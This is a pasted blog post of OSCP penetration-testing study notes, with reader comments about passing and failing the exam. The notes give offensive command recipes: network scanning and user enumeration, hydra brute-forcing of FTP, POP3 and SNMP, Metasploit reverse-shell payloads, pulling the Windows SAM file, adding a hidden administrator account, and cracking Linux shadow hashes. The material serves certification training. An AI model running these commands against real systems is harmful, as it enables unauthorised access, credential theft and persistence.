Advertisement
Guest User

Untitled

a guest
Aug 15th, 2015
5,447
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.82 KB | None | 0 0
  1. OSCP Notes by Ash
  2.  
  3. Reference Site: http://security.crudtastic.com/?p=213
  4.  
  5.  
  6.  
  7. Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.
  8.  
  9.  
  10.  
  11. Scan network for live hosts
  12.  
  13. (nmap/zenmap)
  14.  
  15. For NMAP –
  16.  
  17.  
  18. nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt
  19.  
  20. cat hosts_up.txt | grep -i “up”
  21.  
  22.  
  23.  
  24.  
  25. nmap -PN 192.168.9.200-254
  26.  
  27. (this will also show open ports for each host)
  28.  
  29.  
  30.  
  31.  
  32. Identify OS
  33.  
  34. (nmap/zenmap)
  35.  
  36. For NMAP –
  37.  
  38.  
  39. nmap -O 192.168.0.100 (just OS fingerprint)
  40.  
  41.  
  42. nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traceroute)
  43.  
  44.  
  45.  
  46.  
  47. Check hosts for services
  48.  
  49. (nmap/zenmap)
  50.  
  51. For NMAP
  52.  
  53. - nmap -sS 192.168.9.254 (TCP)
  54.  
  55. - nmap -sU 192.168.9.254 (UDP)
  56.  
  57. (Could be better to do this in zenmap and group servers by services)
  58.  
  59.  
  60. FOR SNMP
  61.  
  62. - snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f
  63.  
  64.  
  65. For a known port
  66.  
  67. - nmap – p 139 192.168.9.254
  68.  
  69.  
  70.  
  71. DNS Lookups/Hostnames
  72.  
  73.  
  74. host -l <domain> <dns server>
  75.  
  76. e.g. host -l acme.local 192.168.0.220
  77.  
  78.  
  79.  
  80.  
  81. Banner grab/Version services
  82.  
  83. (nmap/zenmap/SNMP)
  84.  
  85. Check versions of software/services against milw0rm and security focus)
  86.  
  87.  
  88. For NMAP
  89.  
  90. - nmap -sV 192.168.9.254
  91.  
  92.  
  93.  
  94. For SNMP
  95.  
  96. snmpenum -t 192.168.0.100 (displays all snmp informations for that server)
  97.  
  98.  
  99.  
  100. For SMTP
  101.  
  102. nc -v <mailserver> 25
  103.  
  104. - Will give mailserver version. Can also VRFY to find valid usernames/email accounts
  105.  
  106.  
  107.  
  108. Netbios/SMB
  109.  
  110. - smb4k (graphical interface – lists shares)
  111.  
  112.  
  113. - smbserverscan
  114.  
  115.  
  116. - metasploit auxiliary scanner
  117.  
  118. ./msfconsole
  119.  
  120. show
  121.  
  122. use scanner/smb/version
  123.  
  124. set RHOSTS 192.168.0.1-192.168.0.254
  125.  
  126. run
  127.  
  128.  
  129.  
  130.  
  131. Enumerate Usernames
  132.  
  133. (SNMP/SMTP/SMB[NETBIOS]/Add others here)
  134.  
  135.  
  136. For SMB
  137.  
  138. - nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)
  139.  
  140. (on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)
  141.  
  142.  
  143. For SNMP
  144.  
  145. - nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)
  146.  
  147. - snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4
  148.  
  149.  
  150. For SMTP – (/pentest/enumeration/vrfy)
  151.  
  152. - ./smtp_VRFY.py <mailserver IP>
  153.  
  154. ** NEED TO MAKE THREADED – VERY SLOW **
  155.  
  156.  
  157. SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)
  158.  
  159. - ./samrdump.py SNMP server
  160.  
  161.  
  162. *** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***
  163.  
  164. *** OR /pentest/web/wfuzz/wordlists/others/names.txt ***
  165.  
  166.  
  167.  
  168.  
  169.  
  170. Crack Passwords
  171.  
  172. (hydra/THC bruter)
  173.  
  174. (need mil-dict.txt from Milw0rm – cracked hashs)
  175.  
  176.  
  177. FTP – hydra -l <username> -P mil-dic.txt -f <FTP SERVER> ftp -V
  178.  
  179.  
  180. POP3 – hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)
  181.  
  182.  
  183. SNMP – hydra -P mil-dict.txt -f <SNMP SERVER> -V
  184.  
  185.  
  186. MS VPN – dos2unix words (whatever word list)
  187.  
  188. cat words | thc-pptp-bruter VPN server
  189.  
  190.  
  191.  
  192. Look for known vulnerable services
  193.  
  194. (refer nmap/zenmap output)
  195.  
  196. Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
  197.  
  198.  
  199.  
  200.  
  201. Compile exploit code if possible
  202.  
  203. (milw0rm archive)
  204.  
  205.  
  206. cd /pentest/exploits/milw0rm
  207.  
  208. cat sploitlist.txt | grep -i [exploit]
  209.  
  210.  
  211. Some exploits may be written for compilation under Windows, while others for Linux.
  212.  
  213. You can identify the environment by inspecting the headers.
  214.  
  215. cat exploit | grep “#include”
  216.  
  217.  
  218. Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
  219.  
  220. Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
  221.  
  222.  
  223. Grep out Windows headers, to leave only Linux based exploits:
  224.  
  225. cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u
  226.  
  227.  
  228. LINUX
  229.  
  230. gcc -o dcom 66.c
  231.  
  232. ./dcom
  233.  
  234.  
  235.  
  236. WINDOWS
  237. cd /root/.wine/drive_c/MinGW/bin
  238. wine gcc -o ability.exe ability.c -lwsock32
  239. wine ability.exe (to run compiled file)
  240.  
  241.  
  242.  
  243.  
  244. Wireshark Filters
  245.  
  246.  
  247. To filter out all traffic for IP 192.168.0.100
  248.  
  249. !(IP.ADDR == 192.168.0.100)
  250.  
  251.  
  252.  
  253.  
  254. FUZZING STEPS – ASH STYLE
  255.  
  256. Determine target application and operating system
  257. Obtain a copy of the application
  258. Analyse the RFC & communication protocols
  259. Discover & record crash conditions
  260. Analyse crash conditions for exploitation opportunities
  261.  
  262. Things we need to know
  263.  
  264. Which 4 bytes overwrite EIP
  265. Do we have enough space in buffer for shellcode
  266. Is this shellcode easily accessible in memory
  267. Does the application filter out any characters
  268. Will we encounter overflow protection mechanisms
  269.  
  270.  
  271. (*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***)
  272.  
  273. Creating pattern for EIP location
  274. - framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script)
  275. – then look in ollydbg for pattern (need to reverse it and convert)
  276.  
  277. - pattern_offset.rb <EIP PATTERN>
  278. – will show byte offset
  279.  
  280. Creating shellcode
  281. (in framework3)
  282. ./msfpayload |grep -i shell
  283.  
  284. ./msfpayload …… o (for options)
  285. ./msfpayload …… c (to create)
  286. ** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **
  287.  
  288. CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
  289.  
  290.  
  291. Finding an exploit
  292. /pentest/exploits/milw0rm
  293. grep <exploit> sploitlist.txt
  294.  
  295.  
  296. MSFCLI (p243)
  297. ./msfcli
  298. -o options
  299. -p payloads
  300. -t test
  301. -e exploit
  302.  
  303. MSFCONSOLE
  304. sessions -l => list created sessions
  305. sessions -i # => interact with specific session number
  306.  
  307. show options
  308.  
  309. search <string>
  310.  
  311. use exploit/ …..
  312. set PAYLOAD ….
  313.  
  314. exploit
  315.  
  316.  
  317. Meterpreter Payloads (p260)
  318. payload = windows/meterpreter/reverse_tcp ….
  319.  
  320. meterpreter> help (lists all commands)
  321.  
  322. upload <file> c:\\windows
  323.  
  324. download c:\\windows\\repair\\sam /tmp
  325.  
  326. ps (running tasks)
  327.  
  328. execute -f cmd -c (creates a new channel with the cmd shell)
  329. interact # (interacts with channel)
  330.  
  331.  
  332. Other useful windows commands
  333. net user ash my_password /add
  334. net localgroup administrators ash /add
  335.  
  336.  
  337. Passwords & Hashes
  338. Windows SAM => %systemroot%\Repair
  339. (pwdump or fgdump – p340)
  340.  
  341. or use framework meterpreter shell => gethashes
  342.  
  343. Linux => /etc/passwd & /etc/shadow
  344.  
  345.  
  346. John The Ripper
  347. for linux => unshadow passwd & shadow file to another file
  348.  
  349. ./john hashes.txt
  350.  
  351.  
  352.  
  353. Associated Documents
  354.  
  355. Common Ports – packetlife.net/media/library/23/common-ports.pdf
  356. Wireshark – http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
  357. TCPDUMP – http://packetlife.net/media/library/12/tcpdump.pdf
  358. SANS NETCAT – http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
  359. SANS MISC TOOLS – http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
  360. SANS 504 – Cant find
  361.  
  362. Tags: backtrack, offensive-security, offsec101, oscp, security, Study, training, tutorial
  363. 34 comments
  364. 2 pings
  365.  
  366. Skip to comment form ↓
  367.  
  368. student
  369.  
  370. December 24, 2009 at 5:00 pm (UTC 10)
  371.  
  372. So did you pass your exam?! I started the course recently and came across your post while google knowledge hunting for OSCP ;-)
  373.  
  374. What will you do after OSCP? There is the OSCE but after that the only thing I’ve found is CREST (for professional pen testers in the UK)
  375. Chris
  376.  
  377. January 29, 2010 at 10:47 pm (UTC 10)
  378.  
  379. Hi Ash, I was quite surprised to come across some writings about the OSCP challenge as I was initially looking for something on samrdump for SMB enumeration. Your list of the things for OSCP preparation is pretty close to my prep sheet.
  380.  
  381. Unfortunately I failed the challenge. I can definitely agree that this course is very hardcore. I don’t think you can rest on your laurels! Even covering the entire content of the course I have the feeling that I’d still need to have done more outside work to get through that exam.
  382.  
  383. I’d be interested in how you got on in any case. I’m currently going back through the course material and I hope to get some more time in the labs pretty soon to get more practice. I don’t think I spent enough time finding and using exploits, and understanding the vulnerabilities within the various OS’s and applications to get me ready for the challenge. Next time I want to make sure I have a few more things up my sleeve.
  384.  
  385. Anyway, cheers for the information, I’d be interested in hearing about your experiences of the challenge (without obviously giving too much away)!
  386.  
  387. Chris
  388. ash
  389.  
  390. January 30, 2010 at 8:30 am (UTC 10)
  391.  
  392. Hey Chris,
  393.  
  394. I eventually passed :) It’s a hard exam!! It took me 2 attempts, and when I eventually passed it all seemed so simple and extremely rewarding!
  395.  
  396. I think the key point here to your preparation is to do a lot of work in the labs. You should be able to root all of the lab boxes. Everything that you need to pass the exam (and you should be able to pass it the first time – just make sure to have a break so you don’t go mental like I did) is in the labs there. There is nothing really new, just some pretty cool twists and turns. I know a guy who spent 3 or 4 months in the labs making sure he could get all the machines there.. and he did the exam from start to finish in about 18 hours on his first go.
  397.  
  398. But, I do think you are right, preparation is the key! I did a lot more work getting ready for my second attempt and managed to finish it in about 8 hours or so (mind you I knew what to expect this time)
  399.  
  400. This isn’t an exam where you can sit down and read a book and hope to regurgitate it and pass (thats a CISSP hahaah)
  401.  
  402. Anyway .. Good luck on your resit. I know how you feel, but you do have the upper hand now. Spend the time going over your scans, rebuild the lab scenarios if possible, poke around the labs to see if theres something similar, look in the book, ask in the irc channel .. trust me, things aren’t always as hard as they may seem (but they could be harder)!!
  403.  
  404. And in the word of Muts – Try Harder hahahah
  405. Chris
  406.  
  407. February 1, 2010 at 3:31 am (UTC 10)
  408.  
  409. Thanks Ash, and congratulations! I’ll be back in the labs soon no doubt so will take your advice. Nice one, thanks. ;)
  410. yaggi
  411.  
  412. September 2, 2010 at 2:22 am (UTC 10)
  413.  
  414. Im glad you passed. Me, I failed… I think because of the limitations being set like 1 metasploit and no vuln scan.. I belive we can exploit this but their are tools that are not working during the recon like NMAP… Everytime you do the NMAP it says host is not UP even you will use almost all the options (i.e, -PN)
  415.  
  416. Also, regarding the 4 machines, the instruction is confusing, it says to gain the root access. I believe the way to get the root of the 4 machines is to get an exploit in the internet and run it against the machine right?
  417.  
  418. Hope I can pass in the next round..
  419.  
  420. Hope you can share more information my friend.. Its hard to ask help also..I guess your site give at least an encouraging hints
  421. ash
  422.  
  423. September 2, 2010 at 5:30 am (UTC 10)
  424.  
  425. Dont get discouraged :)
  426.  
  427. You can definitely nmap the machines .. check the timing (-T)
  428.  
  429. Your first machine you have to write an exploit for .. just remember what happened in the class
  430.  
  431. The others are the same as machines you should have done at the end of the book … there is nothing new here.
  432.  
  433. When I resat the exam I completed it in 3 hours :) Let me know if you need to talk about this more .. good luck .. you can do it!!
  434. Yaggi
  435.  
  436. September 2, 2010 at 6:50 pm (UTC 10)
  437.  
  438. Hi ash,
  439.  
  440. Maybe I forgot the timing option, instead, I used unicornscan and netcat scan.. When I get the information like banner, software version, open ports, OS, I feel like stuck since I can’t use more on vuln scanner and metasploit. I was completely stuck and i was not able to gain the confidence again.. I feel sorry that with this information at hand I can’t hack a machine. Although I can go to exploit-db, still the process for me is confusing… I pity myself.
  441.  
  442. I really wanted to know how the 4 machines was hack.. Im not sure to take the exam again coz until now I can’t believe I failed.
  443. ash
  444.  
  445. September 3, 2010 at 9:28 am (UTC 10)
  446.  
  447. nah … dont quit!!
  448.  
  449. Go back to your book and read up on what you can do. it may not be a single exploit or technique, rather multiple exploits or techniques :)
  450.  
  451. If you can do all the exercises in the manual and get the final machines at the end of the manual, you should be fine. If you cant do them, I would suggest getting more lab time, reading the forums, and asking for some help in the IRC channel.
  452.  
  453. There’s some awesome people about that will be more than happy to help you (they helped me greatly)
  454.  
  455. Feel free to contact me if you need to bounce some ideas around.
  456.  
  457. Think about trying to recreate what you scanned int he lab as virtual images so that you can sit at home and practice hacking them as well
  458. marco
  459.  
  460. September 9, 2010 at 9:06 pm (UTC 10)
  461.  
  462. hi ash and yhanks for yours usefull words.
  463. I failed the exam, dunno why..ehehe…i do same things you done but i cant get anything. so if u like email me and maybe we can talk about it.
  464. thanx
  465. ash
  466.  
  467. September 10, 2010 at 6:35 am (UTC 10)
  468.  
  469. Hi Marco .. don’t get too worried about it .. its a hard exam :)
  470.  
  471. How many machines did you get in the exam? Where did you have troubles?
  472.  
  473. Keep trying until you pass.. its worth it :)
  474. marco
  475.  
  476. September 11, 2010 at 4:59 am (UTC 10)
  477.  
  478. eheh..ya…really hard…
  479. i just exploit..0 machines… :(
  480. i got problems with exploitation and so i lose my mind…
  481. i think ive learn well and i really understand how works penetration…but…dunno why i just do nothing with the exam…
  482. ill try harder…
  483. thnx for ur help
  484. subtitles
  485.  
  486. November 21, 2010 at 11:53 pm (UTC 10)
  487.  
  488. Good post
  489. sean
  490.  
  491. February 19, 2011 at 11:41 pm (UTC 10)
  492.  
  493. Hi Ash,
  494. I have just taken the exam yesterday, and I think I have failed :0(
  495. Not a good feeling when you’ve been up all night also.
  496. I will pick myself up and have another go at it after a bit more pwnage in the labs.
  497. Just a thought.. Do they give you the same exam again? if so that will sure help.
  498. thanks
  499. ash
  500.  
  501. February 21, 2011 at 6:25 am (UTC 10)
  502.  
  503. hahah that exam is brutal!!
  504.  
  505. I know how you feel .. You pretty much need to root all of the boxes to pass. Dont let it get to you in any way .. I’m sure you’ll pass it the second time.
  506.  
  507. When I retook my exam I got the same challenges .. just different addresses. You can always practice on your own before the resit .. you should have enough information from your recon to be able to find a way to root all the boxes. After I had a good rest from my exam I had a lightbulb moment where everything seemed so much clearer and straight forward .. I ended up rooting all the boxes in next to no time when I sat it the second time.
  508.  
  509. Good luck.. You’ll be an OSCP in no time. Post back here and let me know how you go :)
  510. Flux
  511.  
  512. March 25, 2011 at 7:51 am (UTC 10)
  513.  
  514. Hi Ash,
  515.  
  516. It seems like allot op OSCP’s have found your post hehe. I’m still in my lab-faze trying harder every day and enjoying myself. I was just wondering a couple of things. Did you use XSS-vulns in the labs (ex: beef), is using msf auxiliary scanners possible during the exam, did you get into the End Goal in the labs?
  517.  
  518. greetings
  519. Dudley
  520.  
  521. April 17, 2012 at 9:48 pm (UTC 10)
  522.  
  523. I’m glad to hear you passed Ash. I am studying in labs and was wondering if you have any insight as to restriction of tools on challenge? I heard that you can’t use metasploit and that has be concerned as I us it a good bit especially for pivot attacks….
  524. ash
  525.  
  526. April 18, 2012 at 6:41 am (UTC 10)
  527.  
  528. From when I did the exam you could only use metasploit for one of the boxes. If you have done the course you will know there is more than one way to skin a cat, and metasploit is just an easier automated way of exploit systems. As for pivoting .. theres numerous ways of doing that, and it’s all covered in the courseware :)
  529.  
  530. Good luck
  531. Dudley
  532.  
  533. April 19, 2012 at 12:47 am (UTC 10)
  534.  
  535. I’ve got about 19 days left in lab and I must say I don’t feel super comfortable about taking test. I under the premise of all the exercises but have had what I would consider not such good luck in labs. I have gotten a network key and gotten into IT network but only got admin on 6 windows boxes and none of the linux boxes which bothers me. So far none of username/passwords I crack have been resused anywhere which I found odd indeed. I also wanted to know if “http://www.milw0rm.com/search.php” is still up as the site is unreachable and I’ve never been on it before. Any suggestions or helpful hints for lab would be welcome. Thanks
  536. Dudley
  537.  
  538. April 19, 2012 at 12:54 am (UTC 10)
  539.  
  540. I’m also week on building exploits as I’m not a programmer do you have any suggestions on what I can read or do to improve this?
  541. Dudley
  542.  
  543. April 19, 2012 at 12:55 am (UTC 10)
  544.  
  545. LOL I meant “weak” not “week” ………….
  546. DrS
  547.  
  548. May 4, 2012 at 11:31 pm (UTC 10)
  549.  
  550. Dudley, you don’t need to use Milw0rm or other websites as it is all in the exploit-db database on your backtrack machine :
  551. By mind, just go to /pentest/exploits/ and make a ‘svn update’ to update the list of public vulnerabilities -they are in sub-folders-.
  552.  
  553. I don’t think you need great developer skills, it’s much on knowing the architecture, how a program works in memory, the network, and identify the critical points (memory access -malloc, even printf()-, database access, etc..). 99% of developers, even C developers, have no knowledge on this part which is important : a compiled program doesn’t follow exactly what a developer defines.
  554.  
  555. Today the most common exploits vector are injections, such as SQL, XSS or session hijacking. Maybe the actual labs and the exam follow this ‘mainstream’.
  556. Dudley
  557.  
  558. May 14, 2012 at 9:57 pm (UTC 10)
  559.  
  560. So took the test and it kicked my butt. I got the buffer overflow written but struggled big time with other 4 machine. Thing is I’m not sure where to start with preparing for retake. one of the server was running hmailserver which I’m sure must have been vulnerable and the other box were runnin different version of FileZilla beta software but had no luck exploiting them at all LOL. Any helpful hints for preparing for retake would be great. Thanks a bunch
  561. ash
  562.  
  563. May 15, 2012 at 7:10 pm (UTC 10)
  564.  
  565. Well, Hopefully your scans are good enough to tell you what OSes and applications are installed on the machines in the exam. You could possibly rebuild this in your own lab environment now and work out what you need to do to root them.
  566.  
  567. That’s where I would start my prep for a resit of the exam.
  568.  
  569. I wouldn’t get too disheartened .. its a hard exam. One of my friends just passed it on the weekend .. and he struggled!
  570. Dudley
  571.  
  572. May 15, 2012 at 8:07 pm (UTC 10)
  573.  
  574. I was able to get app version but nmap was not able to get me an exact OS fingerprint :-( like in the case of hmailserver its running on either server 2003 or XP I suspect its server 2003. The filezilla beta are running on some version of freebsd and server 2003. Never messed with freebsd so not sure where to begin with that. I’m pretty all the test machine were running a firewall due to the limited services and ports enumerated on them. Any suggestion would be greatly appreciated. Thanks Ash.
  575. Dudley
  576.  
  577. May 15, 2012 at 8:10 pm (UTC 10)
  578.  
  579. I found this for hmailserver but could never get it to work maybe you could make some suggestions? My only guess is maybe I was doing something wrong when trying to do the exploit. Thanks
  580.  
  581. http://www.exploit-db.com/exploits/7012/
  582. ash
  583.  
  584. May 16, 2012 at 6:59 am (UTC 10)
  585.  
  586. Have you done the actual course? There’s practice boxes in the lab for you to attack which are very similar to the machines for the final exam.
  587.  
  588. You need to scan all of your hosts, enumerate services, and then look at what vulnerabilities you can exploit. You may not be able to exploit a root vulnerability straight away, you may need to just get shell on the box and then do a local privilege exploit or something.
  589.  
  590. Go back to your manual and have a look at the process outlined in there for the best way to crack these boxes. Just because you see something obvious, it doesnt mean that its the answer .. you may find yourself going down a path that wont produce any results.
  591. Dudley
  592.  
  593. May 16, 2012 at 8:12 pm (UTC 10)
  594.  
  595. Yeah I did the course and thing I found was on exam that nmap scan yielded very few open ports. I’m sure the boxes had firewalls. I got one with a buffer overflow and nadda after that one :-( Should I have scanned for other hosts that weren’t being scored possibly?
  596. ash
  597.  
  598. May 17, 2012 at 6:46 am (UTC 10)
  599.  
  600. Did you scan for both TCP and UDP, did you do some SNMP scans .. did you try throttling your nmap scans a bit? Did you version the services on the ports you found?
  601.  
  602. You only need to scan the servers that they have provided you .. theres no other systems to go for.
  603.  
  604. Did you want to email me your scans so I can see what you have and maybe give you some help?
  605. Dudley
  606.  
  607. May 17, 2012 at 8:10 pm (UTC 10)
  608.  
  609. That would be great if you don’t mind giving me a second opinion. I’m sure I must have missed something.
  610. Dudley
  611.  
  612. May 18, 2012 at 5:02 am (UTC 10)
  613.  
  614. Where should I send my scan results to?
  615. Dudley
  616.  
  617. May 21, 2012 at 7:09 pm (UTC 10)
  618.  
  619. Hey Ash let me know where I can send my scans to to get your opinion. Thanks.
  620. marco
  621.  
  622. June 22, 2012 at 8:21 am (UTC 10)
  623.  
  624. Hi, i wrote some time ago…in these days i thought i never get pwb…fortunatly i was wrong…and i got it.
  625. So i can tell to everyone to listen very well this blog, because is very usefull.
  626. then think about it, i cannot complete PWB because my minds try to complicate a simple question.
  627. think easy….
  628. AK
  629.  
  630. November 29, 2012 at 6:01 am (UTC 10)
  631.  
  632. Hello ASH,
  633.  
  634. I too flunked the exam but I made some kills before dieing out , glad you made it through, just a request to you , can we communicate over mails or IRC or IM anyhow?
  635. ash
  636.  
  637. November 29, 2012 at 7:04 am (UTC 10)
  638.  
  639. Sure, feel free to send me an email. My address is easy to find :-)
  640.  
  641. Leave a Reply
  642.  
  643. Your email address will not be published. Required fields are marked *
  644.  
  645. Name: *
  646.  
  647. Email: *
  648.  
  649. Website:
  650.  
  651. Message: *
  652.  
  653. You may use these HTML tags and attributes:
  654. <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement